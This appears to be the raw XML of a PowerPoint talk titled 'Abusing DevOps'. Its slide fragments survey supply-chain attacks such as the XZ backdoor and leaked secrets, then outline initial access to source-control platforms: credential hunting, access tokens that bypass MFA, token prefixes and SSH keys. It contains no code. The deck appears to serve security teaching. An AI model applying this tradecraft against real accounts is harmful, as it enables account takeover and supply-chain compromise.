          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3878944" h="3643857">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3878945" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3878945" y="3643857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36438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92CD7268-DC8B-D139-A012-43478D16D252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14701985" y="9368891"/>
            <a:ext cx="3177688" cy="563420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3177688" h="563420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3177688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3177688" y="563420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5634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C783E9C-7F65-D222-A7E0-943B4CF2EC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071780" y="338483"/>
            <a:ext cx="14144439" cy="4103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311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Slides</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3236"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2311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311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311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311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311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8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8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r>
              <a:rPr lang="en-US" sz="28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Telegraf"/>
                <a:ea typeface="Telegraf"/>
                <a:cs typeface="Telegraf"/>
                <a:sym typeface="Telegraf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https://github.com/sharpbets/materials/slides/Abusing-DevOps-RTV.pptx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Telegraf"/>
                <a:ea typeface="Telegraf"/>
                <a:cs typeface="Telegraf"/>
                <a:sym typeface="Telegraf"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3236"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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DFEBB0-3CE2-17D7-C775-EE64C88310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3593" y="919006"/>
            <a:ext cx="2380814" cy="23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0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61974" y="2754056"/>
            <a:ext cx="6690445" cy="3217515"/>
            <a:chOff x="0" y="-989881"/>
            <a:chExt cx="8170465" cy="429002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89881"/>
              <a:ext cx="8170465" cy="40197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78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How Is DevOps Targeted? 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3170188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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5497916" y="129950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rot="-990888" flipV="1">
            <a:off x="-2610695" y="-1501965"/>
            <a:ext cx="10372410" cy="3752926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10372410" h="3752926">
                <a:moveTo>
                  <a:pt x="0" y="3752926"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10372409" y="3752926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10372409" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3752926"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6">
              <a:alphaModFix amt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9955175" flipV="1">
            <a:off x="1734305" y="8697504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8">
              <a:alphaModFix amt="6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84153"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6934200" y="1181100"/>
          <a:ext cx="10177587" cy="8056880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10177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0269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4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Package Hijacking</a:t>
                      </a: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XZ utils backdoor (legitimate maintainer)</a:t>
                      </a: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sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t>PyTorch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sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t> (stolen credentials)</a:t>
                      </a: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800" dirty="0"/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800" dirty="0"/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4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Secret leakage</a:t>
                      </a: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</a:rPr>
                        <a:t>Mercedes-Benz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(source code)</a:t>
                      </a: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sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t>PyPi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sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t>/Python (binary file)</a:t>
                      </a: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sym typeface="Telegraf"/>
                      </a:endParaRP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sym typeface="Telegraf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3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rgbClr val="F4E7E7"/>
                          </a:solidFill>
                          <a:latin typeface="Telegraf"/>
                          <a:sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t>Build Misconfiguration</a:t>
                      </a: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GitHub (self-hosted runner)</a:t>
                      </a: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Google (self-hosted runner)</a:t>
                      </a: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4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Reputation Hiding / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4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SocEng</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="4400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F4E7E7"/>
                        </a:solidFill>
                        <a:latin typeface="Telegraf"/>
                        <a:sym typeface="Telegraf"/>
                      </a:endParaRP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sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t>Microsoft / GitHub (file hosting – LUA malware loader)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p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sz="1800" b="1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2C42E25-C213-C078-C46E-B9BABB58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950" y="1196179"/>
            <a:ext cx="1723105" cy="140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rtner With SolarWinds - Climb Channel Solutions">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C685C6D-CEAD-F4B9-A537-B9CB6573E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7095" y="3059611"/>
            <a:ext cx="2324813" cy="124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rcedes logos PNG images free download | Pngimg.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B228C77-4FF4-527F-3927-CBE16AEFE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75" y="4990973"/>
            <a:ext cx="2176057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941D3F-EEDE-E0AD-8D05-B035F6676DEE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 descr="Microsoft Logo | Figma">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C3E1CC-94D3-67C3-8387-72A12C3F2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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="14661761" y="7801885"/>
            <a:ext cx="2726727" cy="121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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3DF2053-5634-7CA5-89BB-21BDA0DC36AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6975128" y="3155770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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E3D50B0-6949-A34B-9971-98328A7285D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6975128" y="5372100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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E31687E-28C0-7BD7-23DF-A34C1875950F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="7505700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2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961599" y="-2782197"/>
            <a:ext cx="11098426" cy="16596766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11098426" h="16596766">
                <a:moveTo>
                  <a:pt x="11098426" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16596766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11098426" y="16596766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28700" y="3078063"/>
            <a:ext cx="7414512" cy="4190760"/>
            <a:chOff x="0" y="66675"/>
            <a:chExt cx="9886015" cy="55876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75"/>
              <a:ext cx="9243864" cy="3099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Initial Access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315300" y="3913855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528662"/>
              <a:ext cx="9886015" cy="11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marR="0" lvl="1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Source Code Management (SCM)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="259080" marR="0" lvl="1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4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Credential hunting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4E7E7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pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="GitHub - edent/SuperTinyIcons: Under 1KB each! Super Tiny Icons are  miniscule SVG versions of your favourite website and app logos">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF7F18A-6579-3DB7-77FA-FBC845335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375" y="2260385"/>
            <a:ext cx="2862072" cy="28620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Lab Logos and Brand Assets | GitLab">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5876D685-485F-0760-AD8B-0C4FBAE79706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5728" y="5558028"/>
            <a:ext cx="2862072" cy="28620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evOps on Azure (@AzureDevOps) / X">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC2D7F3-5681-0FEC-B566-2C1C7440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375" y="5558028"/>
            <a:ext cx="2862072" cy="28620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402430-C3C7-892B-E6BF-ED64A51F40ED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0" descr="Atlassian Bitbucket (@Bitbucket) / X">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2357C49E-7AA8-AA72-22A1-34122A325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5171" y="2260385"/>
            <a:ext cx="2862072" cy="28620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088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62696">
            <a:off x="13798841" y="8537004"/>
            <a:ext cx="6920917" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6920917" h="4114800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6920918" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6920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Accessing SCM Platforms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="829761">
            <a:off x="11519704" y="5427970"/>
            <a:ext cx="3775344" cy="2244614"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3775344" h="2244614">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3775345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3775345" y="2244614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2244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48439">
            <a:off x="7817131" y="7815630"/>
            <a:ext cx="2653737" cy="1577767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2653737" h="1577767">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2653738" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2653738" y="1577768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1577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2589"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293175"/>
          <a:ext cx="16881988" cy="7098475"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="16881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0338">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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Anonymous!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Username/password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Be careful of MFA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Identify if SSO or local accounts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Popular for service accounts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Access tokens – bypass MFA!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Know the prefixes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Default TTL: 30 days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SSH keys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Repository interactions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Regenerate MFA backup codes</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="27432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D0CB3-713E-3AD7-B709-7B7B473EBDB3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043425-5643-53EF-060E-19F5CE201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700046"/>
            <a:ext cx="5562600" cy="6136998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="66000"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 6" descr="GitHub - edent/SuperTinyIcons: Under 1KB each! Super Tiny Icons are  miniscule SVG versions of your favourite website and app logos">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083B8456-B594-FD7F-2184-37662242F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85" y="2308860"/>
            <a:ext cx="1920240" cy="1920240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="66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502C87-6066-ACE2-6E99-403650F674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34800" y="2566873"/>
            <a:ext cx="6468124" cy="7270171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="66000"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 8" descr="GitLab Logos and Brand Assets | GitLab">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4896AD99-80F1-B01F-6B92-0D2E9DC47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6902" y="2308860"/>
            <a:ext cx="1920240" cy="1920240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="66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64A5D677-E290-E909-CF9B-5029C2BE534C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200775" y="4510658"/>
            <a:ext cx="4505323" cy="328041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951928AD-5B4C-FCDF-D9BE-2510B01FA208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11808938" y="3104959"/>
            <a:ext cx="3144340" cy="328041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28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13E344578903499A70EF47DC4A0CBD" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="803ef9a8872e71e11ca0e66e5399308f">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="f2d33142-bf60-4a45-b939-860c234047e1" xmlns:ns3="d767c6c5-958a-4136-8b7b-11e44e6a8d7f" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="00ceb6db1e781c981bf06cd03ced3d99" ns2:_="" ns3:_="">
    <xsd:import namespace="f2d33142-bf60-4a45-b939-860c234047e1"/>
    <xsd:import namespace="d767c6c5-958a-4136-8b7b-11e44e6a8d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d33142-bf60-4a45-b939-860c234047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6d165d17-9b79-46c3-82b9-c927e733c4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7c6c5-958a-4136-8b7b-11e44e6a8d7f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0ff0bf26-5e7d-4601-a8d2-6e73d68a12f4}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="d767c6c5-958a-4136-8b7b-11e44e6a8d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C72A60-FF4B-4E83-9F18-542A1E577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d33142-bf60-4a45-b939-860c234047e1"/>
    <ds:schemaRef ds:uri="d767c6c5-958a-4136-8b7b-11e44e6a8d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D7FA0B-16A2-4D67-9B6B-50EF4AEAEF7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9504</TotalTime>
  <Words>5370</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>943</Paragraphs>
  <Slides>66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Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Telegraf Bold</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Telegraf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Abusing DevOps</dc:title>
  <cp:lastModifiedBy>Porter, Tom</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-09T17:06:49Z</dcterms:modified>
  <dc:identifier>DAGMpACBDuA</dc:identifier>
</cp:coreProperties>
</file>